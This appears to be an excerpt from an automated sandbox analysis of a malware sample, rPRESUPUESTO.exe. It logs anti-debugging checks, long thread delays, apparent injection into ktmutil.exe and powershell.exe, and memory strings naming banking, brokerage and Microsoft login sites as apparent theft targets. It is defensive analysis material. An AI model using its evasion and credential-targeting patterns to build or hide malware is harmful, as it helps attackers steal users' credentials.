            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Window / User API: threadDelayed 1817
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Window / User API: threadDelayed 5188
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4913
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 478
            Source: C:\Windows\SysWOW64\ktmutil.exe Window / User API: threadDelayed 9841
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\ktmutil.exe API coverage: 2.6 %
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe TID: 3012 Thread sleep time: -20291418481080494s >= -30000s
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe TID: 3012 Thread sleep time: -240000s >= -30000s
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe TID: 3012 Thread sleep time: -239873s >= -30000s
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe TID: 3012 Thread sleep time: -239749s >= -30000s
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe TID: 2352 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1576 Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6784 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\ktmutil.exe TID: 5852 Thread sleep count: 131 > 30
            Source: C:\Windows\SysWOW64\ktmutil.exe TID: 5852 Thread sleep time: -262000s >= -30000s
            Source: C:\Windows\SysWOW64\ktmutil.exe TID: 5852 Thread sleep count: 9841 > 30
            Source: C:\Windows\SysWOW64\ktmutil.exe TID: 5852 Thread sleep time: -19682000s >= -30000s
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe TID: 5656 Thread sleep time: -55000s >= -30000s
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe TID: 5656 Thread sleep time: -57000s >= -30000s
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe TID: 5656 Thread sleep time: -37000s >= -30000s
            Source: C:\Windows\SysWOW64\ktmutil.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_0019C0E0 FindFirstFileW,FindNextFileW,FindClose, 9_2_0019C0E0
            Source: 07c402-5.9.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 07c402-5.9.dr Binary or memory string: discord.comVMware20,11696428655f
            Source: 07c402-5.9.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 07c402-5.9.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 07c402-5.9.dr Binary or memory string: global block list test formVMware20,11696428655
            Source: 07c402-5.9.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 07c402-5.9.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 07c402-5.9.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 07c402-5.9.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 07c402-5.9.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 07c402-5.9.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 07c402-5.9.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 07c402-5.9.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 07c402-5.9.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 07c402-5.9.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4587902470.0000000001349000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 07c402-5.9.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 07c402-5.9.dr Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: 07c402-5.9.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 07c402-5.9.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 07c402-5.9.dr Binary or memory string: AMC password management pageVMware20,11696428655
            Source: 07c402-5.9.dr Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: 07c402-5.9.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 07c402-5.9.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 07c402-5.9.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 07c402-5.9.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 07c402-5.9.dr Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: 07c402-5.9.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: firefox.exe, 0000000D.00000002.2619239385.000001F415C3D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllGGJ
            Source: 07c402-5.9.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: ktmutil.exe, 00000009.00000002.4587088156.00000000005F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|(TE
            Source: 07c402-5.9.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 07c402-5.9.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 07c402-5.9.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\ktmutil.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Code function: 5_2_00417BB3 LdrLoadDll, 5_2_00417BB3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Code function: 5_2_0188C188 mov eax, dword ptr fs:[00000030h] 5_2_0188C188
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018662A0 mov eax, dword ptr fs:[00000030h]5_2_018662A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018662A0 mov ecx, dword ptr fs:[00000030h]5_2_018662A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018662A0 mov eax, dword ptr fs:[00000030h]5_2_018662A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018662A0 mov eax, dword ptr fs:[00000030h]5_2_018662A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018662A0 mov eax, dword ptr fs:[00000030h]5_2_018662A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018662A0 mov eax, dword ptr fs:[00000030h]5_2_018662A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CA250 mov eax, dword ptr fs:[00000030h]5_2_017CA250
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017C823B mov eax, dword ptr fs:[00000030h]5_2_017C823B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A62D6 mov eax, dword ptr fs:[00000030h]5_2_018A62D6
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E02E1 mov eax, dword ptr fs:[00000030h]5_2_017E02E1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E02E1 mov eax, dword ptr fs:[00000030h]5_2_017E02E1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E02E1 mov eax, dword ptr fs:[00000030h]5_2_017E02E1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA2C3 mov eax, dword ptr fs:[00000030h]5_2_017DA2C3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA2C3 mov eax, dword ptr fs:[00000030h]5_2_017DA2C3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA2C3 mov eax, dword ptr fs:[00000030h]5_2_017DA2C3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA2C3 mov eax, dword ptr fs:[00000030h]5_2_017DA2C3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA2C3 mov eax, dword ptr fs:[00000030h]5_2_017DA2C3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01858243 mov eax, dword ptr fs:[00000030h]5_2_01858243
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01858243 mov ecx, dword ptr fs:[00000030h]5_2_01858243
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A625D mov eax, dword ptr fs:[00000030h]5_2_018A625D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0188A250 mov eax, dword ptr fs:[00000030h]5_2_0188A250
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0188A250 mov eax, dword ptr fs:[00000030h]5_2_0188A250
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E02A0 mov eax, dword ptr fs:[00000030h]5_2_017E02A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E02A0 mov eax, dword ptr fs:[00000030h]5_2_017E02A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01804588 mov eax, dword ptr fs:[00000030h]5_2_01804588
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E59C mov eax, dword ptr fs:[00000030h]5_2_0180E59C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018505A7 mov eax, dword ptr fs:[00000030h]5_2_018505A7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018505A7 mov eax, dword ptr fs:[00000030h]5_2_018505A7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018505A7 mov eax, dword ptr fs:[00000030h]5_2_018505A7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D8550 mov eax, dword ptr fs:[00000030h]5_2_017D8550
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D8550 mov eax, dword ptr fs:[00000030h]5_2_017D8550
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE53E mov eax, dword ptr fs:[00000030h]5_2_017FE53E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE53E mov eax, dword ptr fs:[00000030h]5_2_017FE53E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE53E mov eax, dword ptr fs:[00000030h]5_2_017FE53E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE53E mov eax, dword ptr fs:[00000030h]5_2_017FE53E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE53E mov eax, dword ptr fs:[00000030h]5_2_017FE53E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0535 mov eax, dword ptr fs:[00000030h]5_2_017E0535
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0535 mov eax, dword ptr fs:[00000030h]5_2_017E0535
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0535 mov eax, dword ptr fs:[00000030h]5_2_017E0535
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0535 mov eax, dword ptr fs:[00000030h]5_2_017E0535
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0535 mov eax, dword ptr fs:[00000030h]5_2_017E0535
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0535 mov eax, dword ptr fs:[00000030h]5_2_017E0535
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E5CF mov eax, dword ptr fs:[00000030h]5_2_0180E5CF
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E5CF mov eax, dword ptr fs:[00000030h]5_2_0180E5CF
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180A5D0 mov eax, dword ptr fs:[00000030h]5_2_0180A5D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180A5D0 mov eax, dword ptr fs:[00000030h]5_2_0180A5D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180C5ED mov eax, dword ptr fs:[00000030h]5_2_0180C5ED
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180C5ED mov eax, dword ptr fs:[00000030h]5_2_0180C5ED
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01866500 mov eax, dword ptr fs:[00000030h]5_2_01866500
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A4500 mov eax, dword ptr fs:[00000030h]5_2_018A4500
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A4500 mov eax, dword ptr fs:[00000030h]5_2_018A4500
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A4500 mov eax, dword ptr fs:[00000030h]5_2_018A4500
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A4500 mov eax, dword ptr fs:[00000030h]5_2_018A4500
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A4500 mov eax, dword ptr fs:[00000030h]5_2_018A4500
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A4500 mov eax, dword ptr fs:[00000030h]5_2_018A4500
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A4500 mov eax, dword ptr fs:[00000030h]5_2_018A4500
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE5E7 mov eax, dword ptr fs:[00000030h]5_2_017FE5E7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE5E7 mov eax, dword ptr fs:[00000030h]5_2_017FE5E7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE5E7 mov eax, dword ptr fs:[00000030h]5_2_017FE5E7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE5E7 mov eax, dword ptr fs:[00000030h]5_2_017FE5E7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE5E7 mov eax, dword ptr fs:[00000030h]5_2_017FE5E7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE5E7 mov eax, dword ptr fs:[00000030h]5_2_017FE5E7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE5E7 mov eax, dword ptr fs:[00000030h]5_2_017FE5E7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE5E7 mov eax, dword ptr fs:[00000030h]5_2_017FE5E7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D25E0 mov eax, dword ptr fs:[00000030h]5_2_017D25E0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D65D0 mov eax, dword ptr fs:[00000030h]5_2_017D65D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F45B1 mov eax, dword ptr fs:[00000030h]5_2_017F45B1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F45B1 mov eax, dword ptr fs:[00000030h]5_2_017F45B1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180656A mov eax, dword ptr fs:[00000030h]5_2_0180656A
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180656A mov eax, dword ptr fs:[00000030h]5_2_0180656A
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180656A mov eax, dword ptr fs:[00000030h]5_2_0180656A
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D2582 mov eax, dword ptr fs:[00000030h]5_2_017D2582
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D2582 mov ecx, dword ptr fs:[00000030h]5_2_017D2582
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FA470 mov eax, dword ptr fs:[00000030h]5_2_017FA470
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FA470 mov eax, dword ptr fs:[00000030h]5_2_017FA470
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FA470 mov eax, dword ptr fs:[00000030h]5_2_017FA470
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0188A49A mov eax, dword ptr fs:[00000030h]5_2_0188A49A
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017C645D mov eax, dword ptr fs:[00000030h]5_2_017C645D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F245A mov eax, dword ptr fs:[00000030h]5_2_017F245A
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018044B0 mov ecx, dword ptr fs:[00000030h]5_2_018044B0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185A4B0 mov eax, dword ptr fs:[00000030h]5_2_0185A4B0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CC427 mov eax, dword ptr fs:[00000030h]5_2_017CC427
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CE420 mov eax, dword ptr fs:[00000030h]5_2_017CE420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CE420 mov eax, dword ptr fs:[00000030h]5_2_017CE420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CE420 mov eax, dword ptr fs:[00000030h]5_2_017CE420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01808402 mov eax, dword ptr fs:[00000030h]5_2_01808402
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01808402 mov eax, dword ptr fs:[00000030h]5_2_01808402
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01808402 mov eax, dword ptr fs:[00000030h]5_2_01808402
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D04E5 mov ecx, dword ptr fs:[00000030h]5_2_017D04E5
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01856420 mov eax, dword ptr fs:[00000030h]5_2_01856420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01856420 mov eax, dword ptr fs:[00000030h]5_2_01856420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01856420 mov eax, dword ptr fs:[00000030h]5_2_01856420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01856420 mov eax, dword ptr fs:[00000030h]5_2_01856420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01856420 mov eax, dword ptr fs:[00000030h]5_2_01856420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01856420 mov eax, dword ptr fs:[00000030h]5_2_01856420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01856420 mov eax, dword ptr fs:[00000030h]5_2_01856420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180A430 mov eax, dword ptr fs:[00000030h]5_2_0180A430
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E443 mov eax, dword ptr fs:[00000030h]5_2_0180E443
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E443 mov eax, dword ptr fs:[00000030h]5_2_0180E443
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E443 mov eax, dword ptr fs:[00000030h]5_2_0180E443
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E443 mov eax, dword ptr fs:[00000030h]5_2_0180E443
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E443 mov eax, dword ptr fs:[00000030h]5_2_0180E443
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E443 mov eax, dword ptr fs:[00000030h]5_2_0180E443
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E443 mov eax, dword ptr fs:[00000030h]5_2_0180E443
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E443 mov eax, dword ptr fs:[00000030h]5_2_0180E443
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D64AB mov eax, dword ptr fs:[00000030h]5_2_017D64AB
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0188A456 mov eax, dword ptr fs:[00000030h]5_2_0188A456
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185C460 mov ecx, dword ptr fs:[00000030h]5_2_0185C460
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187678E mov eax, dword ptr fs:[00000030h]5_2_0187678E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D8770 mov eax, dword ptr fs:[00000030h]5_2_017D8770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018847A0 mov eax, dword ptr fs:[00000030h]5_2_018847A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D0750 mov eax, dword ptr fs:[00000030h]5_2_017D0750
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018507C3 mov eax, dword ptr fs:[00000030h]5_2_018507C3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185E7E1 mov eax, dword ptr fs:[00000030h]5_2_0185E7E1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D0710 mov eax, dword ptr fs:[00000030h]5_2_017D0710
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180C700 mov eax, dword ptr fs:[00000030h]5_2_0180C700
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D47FB mov eax, dword ptr fs:[00000030h]5_2_017D47FB
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D47FB mov eax, dword ptr fs:[00000030h]5_2_017D47FB
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01800710 mov eax, dword ptr fs:[00000030h]5_2_01800710
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F27ED mov eax, dword ptr fs:[00000030h]5_2_017F27ED
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F27ED mov eax, dword ptr fs:[00000030h]5_2_017F27ED
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F27ED mov eax, dword ptr fs:[00000030h]5_2_017F27ED
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180C720 mov eax, dword ptr fs:[00000030h]5_2_0180C720
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180C720 mov eax, dword ptr fs:[00000030h]5_2_0180C720
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184C730 mov eax, dword ptr fs:[00000030h]5_2_0184C730
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180273C mov eax, dword ptr fs:[00000030h]5_2_0180273C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180273C mov ecx, dword ptr fs:[00000030h]5_2_0180273C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180273C mov eax, dword ptr fs:[00000030h]5_2_0180273C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DC7C0 mov eax, dword ptr fs:[00000030h]5_2_017DC7C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180674D mov esi, dword ptr fs:[00000030h]5_2_0180674D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180674D mov eax, dword ptr fs:[00000030h]5_2_0180674D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180674D mov eax, dword ptr fs:[00000030h]5_2_0180674D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01854755 mov eax, dword ptr fs:[00000030h]5_2_01854755
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812750 mov eax, dword ptr fs:[00000030h]5_2_01812750
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812750 mov eax, dword ptr fs:[00000030h]5_2_01812750
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D07AF mov eax, dword ptr fs:[00000030h]5_2_017D07AF
